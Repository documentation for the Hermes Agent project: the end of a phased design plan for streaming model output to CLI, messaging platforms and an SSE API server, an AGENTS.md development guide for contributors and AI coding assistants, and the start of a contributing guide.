             │    CLI    │  │  Gateway  │  │ API Server│
             │  print to │  │  edit msg │  │ SSE event │
             │  terminal │  │  on Tg/Dc │  │ to client │
             └───────────┘  └───────────┘  └───────────┘
```
The agent runs in a thread. The callback puts tokens into a thread-safe queue.
Each consumer reads the queue in its own context (async task, main thread, etc.).
---
## Configuration
### config.yaml
```yaml
streaming:
  enabled: false  # Master switch. Default off.
  # Per-platform overrides (optional):
  # cli: true         # Override for CLI only
  # telegram: true    # Override for Telegram only
  # discord: false    # Keep Discord non-streaming
  # api_server: true  # Override for API server
```
### Environment variables
```
HERMES_STREAMING_ENABLED=true # Master switch via env
```
### How the flag is read
- **CLI**: `load_cli_config()` reads `streaming.enabled`, sets env var. AIAgent
checks at init time.
- **Gateway**: `_run_agent()` reads config, decides whether to pass
`stream_callback` to the AIAgent constructor.
- **API server**: For Chat Completions `stream=true` requests, always uses streaming
regardless of config (the client is explicitly requesting it). For non-stream
requests, uses config.
### Precedence
1. API server: client's `stream` field overrides everything
2. Per-platform config override (e.g., `streaming.telegram: true`)
3. Master `streaming.enabled` flag
4. Default: off (see the resolver sketch below)
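A resolver sketch for this precedence (names are illustrative; `cfg` is the parsed `streaming:` section, `client_stream` the API client's `stream` field when applicable):
```python
def resolve_streaming(platform: str, cfg: dict, client_stream: bool | None = None) -> bool:
    if client_stream is not None:           # 1. API server client request wins
        return client_stream
    if cfg.get(platform) is not None:       # 2. per-platform override
        return bool(cfg[platform])
    return bool(cfg.get("enabled", False))  # 3. master switch, else 4. default off
```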
---
## Implementation Plan
### Phase 1: Core streaming infrastructure in AIAgent
**File: run_agent.py**
#### 1a. Add stream_callback parameter to __init__ (~5 lines)
```python
def __init__(self, ..., stream_callback: callable = None, ...):
    self.stream_callback = stream_callback
```
No other init changes. The callback is optional — when None, everything
works exactly as before.
#### 1b. Add _run_streaming_chat_completion() method (~65 lines)
New method for Chat Completions API streaming:
```python
def _run_streaming_chat_completion(self, api_kwargs: dict):
    """Stream a chat completion, emitting text tokens via stream_callback.

    Returns a fake response object compatible with the non-streaming code path.
    Falls back to non-streaming on any error.
    """
    stream_kwargs = dict(api_kwargs)
    stream_kwargs["stream"] = True
    stream_kwargs["stream_options"] = {"include_usage": True}
    accumulated_content = []
    accumulated_tool_calls = {}  # index -> {id, name, arguments}
    final_usage = None
    try:
        stream = self.client.chat.completions.create(**stream_kwargs)
        for chunk in stream:
            if not chunk.choices:
                # Usage-only chunk (final)
                if chunk.usage:
                    final_usage = chunk.usage
                continue
            delta = chunk.choices[0].delta
            # Text content — emit via callback
            if delta.content:
                accumulated_content.append(delta.content)
                if self.stream_callback:
                    try:
                        self.stream_callback(delta.content)
                    except Exception:
                        pass
            # Tool call deltas — accumulate silently
            if delta.tool_calls:
                for tc_delta in delta.tool_calls:
                    idx = tc_delta.index
                    if idx not in accumulated_tool_calls:
                        accumulated_tool_calls[idx] = {
                            "id": tc_delta.id or "",
                            "name": "", "arguments": ""
                        }
                    if tc_delta.function:
                        if tc_delta.function.name:
                            accumulated_tool_calls[idx]["name"] = tc_delta.function.name
                        if tc_delta.function.arguments:
                            accumulated_tool_calls[idx]["arguments"] += tc_delta.function.arguments
        # Build fake response compatible with existing code
        tool_calls = []
        for idx in sorted(accumulated_tool_calls):
            tc = accumulated_tool_calls[idx]
            if tc["name"]:
                tool_calls.append(SimpleNamespace(
                    id=tc["id"], type="function",
                    function=SimpleNamespace(name=tc["name"], arguments=tc["arguments"]),
                ))
        return SimpleNamespace(
            choices=[SimpleNamespace(
                message=SimpleNamespace(
                    content="".join(accumulated_content) or "",
                    tool_calls=tool_calls or None,
                    role="assistant",
                ),
                finish_reason="tool_calls" if tool_calls else "stop",
            )],
            usage=final_usage,
            model=self.model,
        )
    except Exception as e:
        logger.debug("Streaming failed, falling back to non-streaming: %s", e)
        return self.client.chat.completions.create(**api_kwargs)
```
#### 1c. Modify _run_codex_stream() for Responses API (~10 lines)
The method already iterates the stream. Add callback emission:
```python
def _run_codex_stream(self, api_kwargs: dict):
    with self.client.responses.stream(**api_kwargs) as stream:
        for event in stream:
            # Emit text deltas if streaming callback is set
            if self.stream_callback and hasattr(event, 'type'):
                if event.type == 'response.output_text.delta':
                    try:
                        self.stream_callback(event.delta)
                    except Exception:
                        pass
        return stream.get_final_response()
```
#### 1d. Modify _interruptible_api_call() (~5 lines)
Add the streaming branch:
```python
def _call():
    try:
        if self.api_mode == "codex_responses":
            result["response"] = self._run_codex_stream(api_kwargs)
        elif self.stream_callback is not None:
            result["response"] = self._run_streaming_chat_completion(api_kwargs)
        else:
            result["response"] = self.client.chat.completions.create(**api_kwargs)
    except Exception as e:
        result["error"] = e
```
#### 1e. Signal end-of-stream to consumers (~5 lines)
After the API call returns, signal the callback that streaming is done
so consumers can finalize (remove cursor, close SSE, etc.):
```python
# In run_conversation(), after _interruptible_api_call returns:
if self.stream_callback:
    try:
        self.stream_callback(None)  # None = end of stream signal
    except Exception:
        pass
```
Consumers check: `if delta is None: finalize()`
**Tests for Phase 1:** (~150 lines)
- Test _run_streaming_chat_completion with mocked stream
- Test fallback to non-streaming on error
- Test tool_call accumulation during streaming
- Test stream_callback receives correct deltas
- Test None signal at end of stream
- Test streaming disabled when callback is None
---
### Phase 2: Gateway consumers (Telegram, Discord, etc.)
**File: gateway/run.py**
#### 2a. Read streaming config (~15 lines)
In `_run_agent()`, before creating the AIAgent:
```python
# Read streaming config
_streaming_enabled = False
try:
    # Check per-platform override first
    platform_key = source.platform.value if source.platform else ""
    _stream_cfg = {}  # loaded from config.yaml streaming section
    if _stream_cfg.get(platform_key) is not None:
        _streaming_enabled = bool(_stream_cfg[platform_key])
    else:
        _streaming_enabled = bool(_stream_cfg.get("enabled", False))
except Exception:
    pass
# Env var override
if os.getenv("HERMES_STREAMING_ENABLED", "").lower() in ("true", "1", "yes"):
    _streaming_enabled = True
```
#### 2b. Set up queue + callback (~15 lines)
```python
_stream_q = None
_stream_done = None
_stream_msg_id = [None]  # mutable ref for the async task
if _streaming_enabled:
    import queue as _q
    _stream_q = _q.Queue()
    _stream_done = threading.Event()

    def _on_token(delta):
        if delta is None:
            _stream_done.set()
        else:
            _stream_q.put(delta)
```
Pass `stream_callback=_on_token` to the AIAgent constructor.
#### 2c. Telegram/Discord stream preview task (~50 lines)
```python
async def stream_preview():
    """Progressively edit a message with streaming tokens."""
    if not _stream_q:
        return
    adapter = self.adapters.get(source.platform)
    if not adapter:
        return
    accumulated = []
    token_count = 0
    last_edit = 0.0
    MIN_TOKENS = 20      # Don't show until enough context
    EDIT_INTERVAL = 1.5  # Respect Telegram rate limits
    try:
        while not _stream_done.is_set():
            try:
                chunk = _stream_q.get(timeout=0.1)
                accumulated.append(chunk)
                token_count += 1
            except _q.Empty:
                continue
            now = time.monotonic()
            if token_count >= MIN_TOKENS and (now - last_edit) >= EDIT_INTERVAL:
                preview = "".join(accumulated) + "▌"  # trailing typing cursor
                if _stream_msg_id[0] is None:
                    r = await adapter.send(
                        chat_id=source.chat_id,
                        content=preview,
                        metadata=_thread_metadata,
                    )
                    if r.success and r.message_id:
                        _stream_msg_id[0] = r.message_id
                else:
                    await adapter.edit_message(
                        chat_id=source.chat_id,
                        message_id=_stream_msg_id[0],
                        content=preview,
                    )
                last_edit = now
        # Drain remaining tokens
        while not _stream_q.empty():
            accumulated.append(_stream_q.get_nowait())
        # Final edit — remove cursor, show complete text
        if _stream_msg_id[0] and accumulated:
            await adapter.edit_message(
                chat_id=source.chat_id,
                message_id=_stream_msg_id[0],
                content="".join(accumulated),
            )
    except asyncio.CancelledError:
        # Clean up on cancel
        if _stream_msg_id[0] and accumulated:
            try:
                await adapter.edit_message(
                    chat_id=source.chat_id,
                    message_id=_stream_msg_id[0],
                    content="".join(accumulated),
                )
            except Exception:
                pass
    except Exception as e:
        logger.debug("stream_preview error: %s", e)
```
#### 2d. Skip final send if already streamed (~10 lines)
In `_process_message_background()` (base.py), after getting the response,
if streaming was active and `_stream_msg_id[0]` is set, the final response
was already delivered via progressive edits. Skip the normal `self.send()`
call to avoid duplicating the message.
This is the most delicate integration point — we need to communicate from
the gateway's `_run_agent` back to the base adapter's response sender that
the response was already delivered. Options:
- **Option A**: Return a special marker in the result dict:
`result["_streamed_msg_id"] = _stream_msg_id[0]`
The base adapter checks this and skips `send()`.
- **Option B**: Edit the already-sent message with the final response
(which may differ slightly from accumulated tokens due to think-block
stripping, etc.) and don't send a new one.
- **Option C**: The stream preview task handles the FULL final response
(including any post-processing), and the handler returns None to skip
the normal send path.
Recommended: **Option A** — cleanest separation. The result dict already
carries metadata; adding one more field is low-risk.
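For illustration, the base-adapter side of Option A might look like this (method names follow the sketches above; exact signatures are assumptions):
```python
# In _process_message_background() (base.py), after the agent result arrives:
streamed_id = result.get("_streamed_msg_id")
if streamed_id:
    # Already delivered via progressive edits — reconcile the last edit with
    # the post-processed final_response instead of sending a duplicate.
    await self.edit_message(chat_id=source.chat_id,
                            message_id=streamed_id,
                            content=final_response)
else:
    await self.send(chat_id=source.chat_id, content=final_response)
```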
**Platform-specific considerations:**
| Platform | Edit support | Rate limits | Streaming approach |
|----------|-------------|-------------|-------------------|
| Telegram | ✅ edit_message_text | ~20 edits/min | Edit every 1.5s |
| Discord | ✅ message.edit | 5 edits/5s per message | Edit every 1.2s |
| Slack | ✅ chat.update | Tier 3 (~50/min) | Edit every 1.5s |
| WhatsApp | ❌ no edit support | N/A | Skip streaming, use normal path |
| HomeAssistant | ❌ no edit | N/A | Skip streaming |
| API Server | ✅ SSE native | No limit | Real SSE events |
WhatsApp and HomeAssistant fall back to non-streaming automatically because
they don't support message editing.
**Tests for Phase 2:** (~100 lines)
- Test stream_preview sends/edits correctly
- Test skip-final-send when streaming delivered
- Test WhatsApp/HA graceful fallback
- Test streaming disabled per-platform config
- Test thread_id metadata forwarded in stream messages
---
### Phase 3: CLI streaming
**File: cli.py**
#### 3a. Set up callback in the CLI chat loop (~20 lines)
In `_chat_once()` or wherever the agent is invoked:
```python
if streaming_enabled:
    _stream_q = queue.Queue()
    _stream_done = threading.Event()

    def _cli_stream_callback(delta):
        if delta is None:
            _stream_done.set()
        else:
            _stream_q.put(delta)

    agent.stream_callback = _cli_stream_callback
```
#### 3b. Token display thread/task (~30 lines)
Start a thread that reads the queue and prints tokens:
```python
def _stream_display():
    """Print tokens to terminal as they arrive."""
    # `top` / `bot` are the response-box border strings cli.py already builds
    first_token = True
    while not _stream_done.is_set():
        try:
            delta = _stream_q.get(timeout=0.1)
        except queue.Empty:
            continue
        if first_token:
            # Print response box top border
            _cprint(f"\n{top}")
            first_token = False
        sys.stdout.write(delta)
        sys.stdout.flush()
    # Drain remaining
    while not _stream_q.empty():
        sys.stdout.write(_stream_q.get_nowait())
        sys.stdout.flush()
    # Print bottom border
    _cprint(f"\n\n{bot}")
```
**Integration challenge: prompt_toolkit**
The CLI uses prompt_toolkit which controls the terminal. Writing directly
to stdout while prompt_toolkit is active can cause display corruption.
The existing KawaiiSpinner already solves this by using prompt_toolkit's
`patch_stdout` context. The streaming display would need to do the same.
Alternative: use `_cprint()` for each token chunk (routes through
prompt_toolkit's renderer). But this might be slow for individual tokens.
Recommended approach: accumulate tokens in small batches (e.g., every 50ms)
and `_cprint()` the batch. This balances display responsiveness with
prompt_toolkit compatibility.
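A sketch of that batched variant (assumes `_cprint()` accepts an `end=` keyword; adjust to its real signature):
```python
import queue
import time

def _stream_display_batched():
    """Flush accumulated tokens roughly every 50 ms through _cprint()."""
    buf, last_flush = [], time.monotonic()
    while not _stream_done.is_set():
        try:
            buf.append(_stream_q.get(timeout=0.05))
        except queue.Empty:
            pass
        if buf and (time.monotonic() - last_flush) >= 0.05:
            _cprint("".join(buf), end="")
            buf, last_flush = [], time.monotonic()
    while not _stream_q.empty():  # drain whatever arrived after the done signal
        buf.append(_stream_q.get_nowait())
    if buf:
        _cprint("".join(buf), end="")
```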
**Tests for Phase 3:** (~50 lines)
- Test CLI streaming callback setup
- Test response box borders with streaming
- Test fallback when streaming disabled
---
### Phase 4: API Server real streaming
**File: gateway/platforms/api_server.py**
Replace the pseudo-streaming `_write_sse_chat_completion()` with real
token-by-token SSE when the agent supports it.
#### 4a. Wire streaming callback for stream=true requests (~20 lines)
```python
if stream:
    _stream_q = queue.Queue()

    def _api_stream_callback(delta):
        _stream_q.put(delta)  # None = done

    # Pass callback to _run_agent
    result, usage = await self._run_agent(
        ..., stream_callback=_api_stream_callback,
    )
```
#### 4b. Real SSE writer (~40 lines)
```python
async def _write_real_sse(self, request, completion_id, model, stream_q):
    response = web.StreamResponse(
        headers={"Content-Type": "text/event-stream", "Cache-Control": "no-cache"},
    )
    await response.prepare(request)
    # Role chunk
    await response.write(...)
    # Stream content chunks as they arrive
    while True:
        try:
            delta = await asyncio.get_event_loop().run_in_executor(
                None, lambda: stream_q.get(timeout=0.1)
            )
        except queue.Empty:
            continue
        if delta is None:  # End of stream
            break
        chunk = {"id": completion_id, "object": "chat.completion.chunk", ...,
                 "choices": [{"delta": {"content": delta}, ...}]}
        await response.write(f"data: {json.dumps(chunk)}\n\n".encode())
    # Finish + [DONE]
    await response.write(...)
    await response.write(b"data: [DONE]\n\n")
    return response
```
**Challenge: concurrent execution**
The agent runs in a thread executor. SSE writing happens in the async event
loop. The queue bridges them. But `_run_agent()` currently awaits the full
result before returning. For real streaming, we need to start the agent in
the background and stream tokens while it runs:
```python
# Start agent in background
agent_task = asyncio.create_task(self._run_agent_async(...))
# Stream tokens while agent runs
await self._write_real_sse(request, ..., stream_q)
# Agent is done by now (stream_q received None)
result, usage = await agent_task
```
This requires splitting `_run_agent` into an async version that doesn't
block waiting for the result, or running it in a separate task.
**Responses API SSE format:**
For `/v1/responses` with `stream=true`, the SSE events are different:
```
event: response.output_text.delta
data: {"type":"response.output_text.delta","delta":"Hello"}
event: response.completed
data: {"type":"response.completed","response":{...}}
```
This needs a separate SSE writer that emits Responses API format events.
**Tests for Phase 4:** (~80 lines)
- Test real SSE streaming with mocked agent
- Test SSE event format (Chat Completions vs Responses)
- Test client disconnect during streaming
- Test fallback to pseudo-streaming when callback not available
---
## Integration Issues & Edge Cases
### 1. Tool calls during streaming
When the model returns tool calls instead of text, no text tokens are emitted.
The stream_callback is simply never called with text. After tools execute, the
next API call may produce the final text response — streaming picks up again.
The stream preview task needs to handle this: if no tokens arrive during a
tool-call round, don't send/edit any message. The tool progress messages
continue working as before.
### 2. Duplicate messages
The biggest risk: the agent sends the final response normally (via the
existing send path) AND the stream preview already showed it. The user
sees the response twice.
Prevention: when streaming is active and tokens were delivered, the final
response send must be suppressed. The `result["_streamed_msg_id"]` marker
tells the base adapter to skip its normal send.
### 3. Response post-processing
The final response may differ from the accumulated streamed tokens:
- Think block stripping (`<think>...</think>` removed)
- Trailing whitespace cleanup
- Tool result media tag appending
The stream preview shows raw tokens. The final edit should use the
post-processed version. This means the final edit (removing the cursor)
should use the post-processed `final_response`, not just the accumulated
stream text.
### 4. Context compression during streaming
If the agent triggers context compression mid-conversation, the streaming
tokens from BEFORE compression are from a different context than those
after. This isn't a problem in practice — compression happens between
API calls, not during streaming.
### 5. Interrupt during streaming
User sends a new message while streaming → interrupt. The stream is killed
(HTTP connection closed), accumulated tokens are shown as-is (no cursor),
and the interrupt message is processed normally. This is already handled by
`_interruptible_api_call` closing the client.
### 6. Multi-model / fallback
If the primary model fails and the agent falls back to a different model,
streaming state resets. The fallback call may or may not support streaming.
The graceful fallback in `_run_streaming_chat_completion` handles this.
### 7. Rate limiting on edits
Telegram: ~20 edits/minute (~1 every 3 seconds to be safe)
Discord: 5 edits per 5 seconds per message
Slack: ~50 API calls/minute
The 1.5s edit interval is conservative enough for all platforms. If we get
429 rate limit errors on edits, just skip that edit cycle and try next time.
---
## Files Changed Summary
| File | Phase | Changes |
|------|-------|---------|
| `run_agent.py` | 1 | +stream_callback param, +_run_streaming_chat_completion(), modify _run_codex_stream(), modify _interruptible_api_call() |
| `gateway/run.py` | 2 | +streaming config reader, +queue/callback setup, +stream_preview task, +skip-final-send logic |
| `gateway/platforms/base.py` | 2 | +check for _streamed_msg_id in response handler |
| `cli.py` | 3 | +streaming setup, +token display, +response box integration |
| `gateway/platforms/api_server.py` | 4 | +real SSE writer, +streaming callback wiring |
| `hermes_cli/config.py` | 1 | +streaming config defaults |
| `cli-config.yaml.example` | 1 | +streaming section |
| `tests/test_streaming.py` | 1-4 | NEW — ~380 lines of tests |
**Total new code**: ~500 lines across all phases
**Total test code**: ~380 lines
---
## Rollout Plan
1. **Phase 1** (core): Merge to main. Streaming disabled by default.
Zero impact on existing behavior. Can be tested with env var.
2. **Phase 2** (gateway): Merge to main. Test on Telegram manually.
Enable per-platform: `streaming.telegram: true` in config.
3. **Phase 3** (CLI): Merge to main. Test in terminal.
Enable: `streaming.cli: true` or `streaming.enabled: true`.
4. **Phase 4** (API server): Merge to main. Test with Open WebUI.
Auto-enabled when client sends `stream: true`.
Each phase is independently mergeable and testable. Streaming stays
off by default throughout. Once all phases are stable, consider
changing the default to enabled.
---
## Config Reference (final state)
```yaml
# config.yaml
streaming:
  enabled: false      # Master switch (default: off)
  cli: true           # Per-platform override
  telegram: true
  discord: true
  slack: true
  api_server: true    # API server always streams when client requests it
  edit_interval: 1.5  # Seconds between message edits (default: 1.5)
  min_tokens: 20      # Tokens before first display (default: 20)
```
```bash
# Environment variable override
HERMES_STREAMING_ENABLED=true
```

AGENTS.md

@@ -0,0 +1,348 @@
# Hermes Agent - Development Guide
Instructions for AI coding assistants and developers working on the hermes-agent codebase.
## Development Environment
```bash
source .venv/bin/activate # ALWAYS activate before running Python
```
## Project Structure
```
hermes-agent/
├── run_agent.py # AIAgent class — core conversation loop
├── model_tools.py # Tool orchestration, _discover_tools(), handle_function_call()
├── toolsets.py # Toolset definitions, _HERMES_CORE_TOOLS list
├── cli.py # HermesCLI class — interactive CLI orchestrator
├── hermes_state.py # SessionDB — SQLite session store (FTS5 search)
├── agent/ # Agent internals
│ ├── prompt_builder.py # System prompt assembly
│ ├── context_compressor.py # Auto context compression
│ ├── prompt_caching.py # Anthropic prompt caching
│ ├── auxiliary_client.py # Auxiliary LLM client (vision, summarization)
│ ├── model_metadata.py # Model context lengths, token estimation
│ ├── display.py # KawaiiSpinner, tool preview formatting
│ ├── skill_commands.py # Skill slash commands (shared CLI/gateway)
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI subcommands and setup
│ ├── main.py # Entry point — all `hermes` subcommands
│ ├── config.py # DEFAULT_CONFIG, OPTIONAL_ENV_VARS, migration
│ ├── commands.py # Slash command definitions + SlashCommandCompleter
│ ├── callbacks.py # Terminal callbacks (clarify, sudo, approval)
│ ├── setup.py # Interactive setup wizard
│ ├── skin_engine.py # Skin/theme engine — CLI visual customization
│ ├── skills_config.py # `hermes skills` — enable/disable skills per platform
│ ├── tools_config.py # `hermes tools` — enable/disable tools per platform
│ ├── skills_hub.py # `/skills` slash command (search, browse, install)
│ ├── models.py # Model catalog, provider model lists
│ └── auth.py # Provider credential resolution
├── tools/ # Tool implementations (one file per tool)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection
│ ├── terminal_tool.py # Terminal orchestration
│ ├── process_registry.py # Background process management
│ ├── file_tools.py # File read/write/search/patch
│ ├── web_tools.py # Firecrawl search/extract
│ ├── browser_tool.py # Browserbase browser automation
│ ├── code_execution_tool.py # execute_code sandbox
│ ├── delegate_tool.py # Subagent delegation
│ ├── mcp_tool.py # MCP client (~1050 lines)
│ └── environments/ # Terminal backends (local, docker, ssh, modal, daytona, singularity)
├── gateway/ # Messaging platform gateway
│ ├── run.py # Main loop, slash commands, message dispatch
│ ├── session.py # SessionStore — conversation persistence
│ └── platforms/ # Adapters: telegram, discord, slack, whatsapp, homeassistant, signal
├── acp_adapter/ # ACP server (VS Code / Zed / JetBrains integration)
├── cron/ # Scheduler (jobs.py, scheduler.py)
├── environments/ # RL training environments (Atropos)
├── tests/ # Pytest suite (~3000 tests)
└── batch_runner.py # Parallel batch processing
```
**User config:** `~/.hermes/config.yaml` (settings), `~/.hermes/.env` (API keys)
## File Dependency Chain
```
tools/registry.py (no deps — imported by all tool files)
tools/*.py (each calls registry.register() at import time)
model_tools.py (imports tools/registry + triggers tool discovery)
run_agent.py, cli.py, batch_runner.py, environments/
```
---
## AIAgent Class (run_agent.py)
```python
class AIAgent:
    def __init__(self,
                 model: str = "anthropic/claude-opus-4.6",
                 max_iterations: int = 90,
                 enabled_toolsets: list = None,
                 disabled_toolsets: list = None,
                 quiet_mode: bool = False,
                 save_trajectories: bool = False,
                 platform: str = None,  # "cli", "telegram", etc.
                 session_id: str = None,
                 skip_context_files: bool = False,
                 skip_memory: bool = False,
                 # ... plus provider, api_mode, callbacks, routing params
                 ): ...

    def chat(self, message: str) -> str:
        """Simple interface — returns final response string."""

    def run_conversation(self, user_message: str, system_message: str = None,
                         conversation_history: list = None, task_id: str = None) -> dict:
        """Full interface — returns dict with final_response + messages."""
```
### Agent Loop
The core loop is inside `run_conversation()` — entirely synchronous:
```python
while api_call_count < self.max_iterations and self.iteration_budget.remaining > 0:
    response = client.chat.completions.create(model=model, messages=messages, tools=tool_schemas)
    if response.tool_calls:
        for tool_call in response.tool_calls:
            result = handle_function_call(tool_call.name, tool_call.args, task_id)
            messages.append(tool_result_message(result))
        api_call_count += 1
    else:
        return response.content
```
Messages follow OpenAI format: `{"role": "system/user/assistant/tool", ...}`. Reasoning content is stored in `assistant_msg["reasoning"]`.
---
## CLI Architecture (cli.py)
- **Rich** for banner/panels, **prompt_toolkit** for input with autocomplete
- **KawaiiSpinner** (`agent/display.py`) — animated faces during API calls, `┊` activity feed for tool results
- `load_cli_config()` in cli.py merges hardcoded defaults + user config YAML
- **Skin engine** (`hermes_cli/skin_engine.py`) — data-driven CLI theming; initialized from `display.skin` config key at startup; skins customize banner colors, spinner faces/verbs/wings, tool prefix, response box, branding text
- `process_command()` is a method on `HermesCLI` (not in commands.py)
- Skill slash commands: `agent/skill_commands.py` scans `~/.hermes/skills/`, injects as **user message** (not system prompt) to preserve prompt caching
### Adding CLI Commands
1. Add to `COMMANDS` dict in `hermes_cli/commands.py`
2. Add handler in `HermesCLI.process_command()` in `cli.py`
3. For persistent settings, use `save_config_value()` in `cli.py` (see the sketch below)
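A minimal sketch for a hypothetical `/hello` command (the `COMMANDS` entry shape and the `process_command()` body are illustrative, not the real structures):
```python
# hermes_cli/commands.py — register for autocomplete/help (entry shape assumed)
COMMANDS["/hello"] = "Print a friendly greeting"

# cli.py — inside HermesCLI.process_command()
if command.strip() == "/hello":
    print("Hello from Hermes!")  # real handlers render via the CLI's Rich console
    return True
```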
---
## Adding New Tools
Requires changes in **3 files**:
**1. Create `tools/your_tool.py`:**
```python
import json, os
from tools.registry import registry

def check_requirements() -> bool:
    return bool(os.getenv("EXAMPLE_API_KEY"))

def example_tool(param: str, task_id: str = None) -> str:
    return json.dumps({"success": True, "data": "..."})

registry.register(
    name="example_tool",
    toolset="example",
    schema={"name": "example_tool", "description": "...", "parameters": {...}},
    handler=lambda args, **kw: example_tool(param=args.get("param", ""), task_id=kw.get("task_id")),
    check_fn=check_requirements,
    requires_env=["EXAMPLE_API_KEY"],
)
```
**2. Add import** in `model_tools.py` `_discover_tools()` list.
**3. Add to `toolsets.py`** — either `_HERMES_CORE_TOOLS` (all platforms) or a new toolset.
The registry handles schema collection, dispatch, availability checking, and error wrapping. All handlers MUST return a JSON string.
**Agent-level tools** (todo, memory): intercepted by `run_agent.py` before `handle_function_call()`. See `todo_tool.py` for the pattern.
---
## Adding Configuration
### config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. Bump `_config_version` (currently 5) to trigger migration for existing users
### .env variables:
1. Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py` with metadata:
```python
"NEW_API_KEY": {
"description": "What it's for",
"prompt": "Display name",
"url": "https://...",
"password": True,
"category": "tool", # provider, tool, messaging, setting
},
```
### Config loaders (two separate systems):
| Loader | Used by | Location |
|--------|---------|----------|
| `load_cli_config()` | CLI mode | `cli.py` |
| `load_config()` | `hermes tools`, `hermes setup` | `hermes_cli/config.py` |
| Direct YAML load | Gateway | `gateway/run.py` |
---
## Skin/Theme System
The skin engine (`hermes_cli/skin_engine.py`) provides data-driven CLI visual customization. Skins are **pure data** — no code changes needed to add a new skin.
### Architecture
```
hermes_cli/skin_engine.py # SkinConfig dataclass, built-in skins, YAML loader
~/.hermes/skins/*.yaml # User-installed custom skins (drop-in)
```
- `init_skin_from_config()` — called at CLI startup, reads `display.skin` from config
- `get_active_skin()` — returns cached `SkinConfig` for the current skin
- `set_active_skin(name)` — switches skin at runtime (used by `/skin` command)
- `load_skin(name)` — loads from user skins first, then built-ins, then falls back to default
- Missing skin values inherit from the `default` skin automatically
### What skins customize
| Element | Skin Key | Used By |
|---------|----------|---------|
| Banner panel border | `colors.banner_border` | `banner.py` |
| Banner panel title | `colors.banner_title` | `banner.py` |
| Banner section headers | `colors.banner_accent` | `banner.py` |
| Banner dim text | `colors.banner_dim` | `banner.py` |
| Banner body text | `colors.banner_text` | `banner.py` |
| Response box border | `colors.response_border` | `cli.py` |
| Spinner faces (waiting) | `spinner.waiting_faces` | `display.py` |
| Spinner faces (thinking) | `spinner.thinking_faces` | `display.py` |
| Spinner verbs | `spinner.thinking_verbs` | `display.py` |
| Spinner wings (optional) | `spinner.wings` | `display.py` |
| Tool output prefix | `tool_prefix` | `display.py` |
| Agent name | `branding.agent_name` | `banner.py`, `cli.py` |
| Welcome message | `branding.welcome` | `cli.py` |
| Response box label | `branding.response_label` | `cli.py` |
| Prompt symbol | `branding.prompt_symbol` | `cli.py` |
### Built-in skins
- `default` — Classic Hermes gold/kawaii (the current look)
- `ares` — Crimson/bronze war-god theme with custom spinner wings
- `mono` — Clean grayscale monochrome
- `slate` — Cool blue developer-focused theme
### Adding a built-in skin
Add to `_BUILTIN_SKINS` dict in `hermes_cli/skin_engine.py`:
```python
"mytheme": {
"name": "mytheme",
"description": "Short description",
"colors": { ... },
"spinner": { ... },
"branding": { ... },
"tool_prefix": "",
},
```
### User skins (YAML)
Users create `~/.hermes/skins/<name>.yaml`:
```yaml
name: cyberpunk
description: Neon-soaked terminal theme
colors:
  banner_border: "#FF00FF"
  banner_title: "#00FFFF"
  banner_accent: "#FF1493"
spinner:
  thinking_verbs: ["jacking in", "decrypting", "uploading"]
  wings:
    - ["⟨⚡", "⚡⟩"]
branding:
  agent_name: "Cyber Agent"
  response_label: " ⚡ Cyber "
tool_prefix: "▏"
```
Activate with `/skin cyberpunk` or `display.skin: cyberpunk` in config.yaml.
---
## Important Policies
### Prompt Caching Must Not Break
Hermes-Agent ensures caching remains valid throughout a conversation. **Do NOT implement changes that would:**
- Alter past context mid-conversation
- Change toolsets mid-conversation
- Reload memories or rebuild system prompts mid-conversation
Cache-breaking forces dramatically higher costs. The ONLY time we alter context is during context compression.
### Working Directory Behavior
- **CLI**: Uses the current directory (`os.getcwd()`)
- **Messaging**: Uses `MESSAGING_CWD` env var (default: home directory)
### Background Process Notifications (Gateway)
When `terminal(background=true, check_interval=...)` is used, the gateway runs a watcher that
pushes status updates to the user's chat. Control verbosity with `display.background_process_notifications`
in config.yaml (or `HERMES_BACKGROUND_NOTIFICATIONS` env var):
- `all` — running-output updates + final message (default)
- `result` — only the final completion message
- `error` — only the final message when exit code != 0
- `off` — no watcher messages at all (config example below)
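For example, to surface only failures (key path as documented above):
```yaml
# ~/.hermes/config.yaml
display:
  background_process_notifications: error
```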
---
## Known Pitfalls
### DO NOT use `simple_term_menu` for interactive menus
Rendering bugs in tmux/iTerm2 — ghosting on scroll. Use `curses` (stdlib) instead. See `hermes_cli/tools_config.py` for the pattern.
### DO NOT use `\033[K` (ANSI erase-to-EOL) in spinner/display code
Leaks as literal `?[K` text under `prompt_toolkit`'s `patch_stdout`. Use space-padding: `f"\r{line}{' ' * pad}"`.
### `_last_resolved_tool_names` is a process-global in `model_tools.py`
When subagents overwrite this global, `execute_code` calls after delegation may fail with missing tool imports. Known bug.
### Tests must not write to `~/.hermes/`
The `_isolate_hermes_home` autouse fixture in `tests/conftest.py` redirects `HERMES_HOME` to a temp dir. Never hardcode `~/.hermes/` paths in tests.
---
## Testing
```bash
source .venv/bin/activate
python -m pytest tests/ -q # Full suite (~3000 tests, ~3 min)
python -m pytest tests/test_model_tools.py -q # Toolset resolution
python -m pytest tests/test_cli_init.py -q # CLI config loading
python -m pytest tests/gateway/ -q # Gateway tests
python -m pytest tests/tools/ -q # Tool-level tests
```
Always run the full suite before pushing changes.

CONTRIBUTING.md

@@ -0,0 +1,659 @@
# Contributing to Hermes Agent
Thank you for contributing to Hermes Agent! This guide covers everything you need: setting up your dev environment, understanding the architecture, deciding what to build, and getting your PR merged.
---
## Contribution Priorities
We value contributions in this order:
1. **Bug fixes** — crashes, incorrect behavior, data loss. Always top priority.
2. **Cross-platform compatibility** — Windows, macOS, different Linux distros, different terminal emulators. We want Hermes to work everywhere.
3. **Security hardening** — shell injection, prompt injection, path traversal, privilege escalation. See [Security](#security-considerations).
4. **Performance and robustness** — retry logic, error handling, graceful degradation.
5. **New skills** — but only broadly useful ones. See [Should it be a Skill or a Tool?](#should-it-be-a-skill-or-a-tool)
6. **New tools** — rarely needed. Most capabilities should be skills. See below.
7. **Documentation** — fixes, clarifications, new examples.
---
## Should it be a Skill or a Tool?
This is the most common question for new contributors. The answer is almost always **skill**.
### Make it a Skill when:
- The capability can be expressed as instructions + shell commands + existing tools
- It wraps an external CLI or API that the agent can call via `terminal` or `web_extract`
- It doesn't need custom Python integration or API key management baked into the agent
